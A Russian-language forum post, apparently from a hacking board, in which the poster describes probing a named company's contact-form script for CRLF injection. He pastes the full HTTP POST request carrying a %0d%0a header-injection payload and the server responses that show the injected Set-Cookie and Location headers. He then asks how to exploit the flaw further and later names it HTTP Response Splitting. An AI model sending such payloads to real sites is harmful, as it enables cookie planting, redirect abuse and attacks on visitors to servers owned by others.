я просканил своим сканером один сайтик он мне выдал что есть возможность CRLF Injection..и выдал сайт с информацией http://www.securityfocus.com/archive/1/271515 .. так вот я посылаю уязвимому скрипту такой запрос Code: POST /contact/send.phtml HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) Host: www.сайт.ком Content-Length: 312 Cookie: sessionid=61c68c27ef7e13a8992dc02ae32a699a;4images_lastvisit=1113210615;4images_userid=-1 Connection: Close fName%5B1%5D=Name&fData%5B1%5D=1&fName%5B2%5D=Email&fData%5B2%5D=1&fName%5B3%5D=Message&fData%5B3%5D=1&fMail=info%40az-maz%2Ecom&fTitle=1&fSubject=mail%20from%20az-maz%20website&fCount=3&fOk=some_url%0d%0aSet-Cookie%3Athis_header%3Dwas_injected_by_wvsBad=http%3A%2F%2Fwww%2Eaz-maz%2Ecom%2Fcontact%2Ferror%2Ephp а он в ответ смотрите что Code: HTTP/1.1 302 Found Date: Mon, 11 Apr 2005 09:12:52 GMT Server: Apache X-Powered-By: PHP/4.3.9 Location: some_url Set-Cookie: this_header=was_injected_by_wvs Connection: close Content-Type: text/html это значит можно произвольно давать значения скрипту , да? и если в запросе вместо some_url подставить какой нить адрес потом вместо Set-Cookie подставить Location , вместо this_header подставить $url а дальше ввести адрес какогото сайта , то получим такой вот ответ Code: HTTP/1.1 302 Found Date: Mon, 11 Apr 2005 09:40:53 GMT Server: Apache X-Powered-By: PHP/4.3.9 Location: сайт_который_написали Location:$url=сайт Connection: close Content-Type: text/html так вот , как можно использовать эту багу более грамотно
ну плз ответьте мне это необходимо .. если не поняли то что я написал скажите и я все объясню по порядку =)
http://www.xakep.ru/magazine/xa/071/070/1.asp ну и ладно я уже нашел доки nо этому виду атаки и называется она HTTP Response Splitting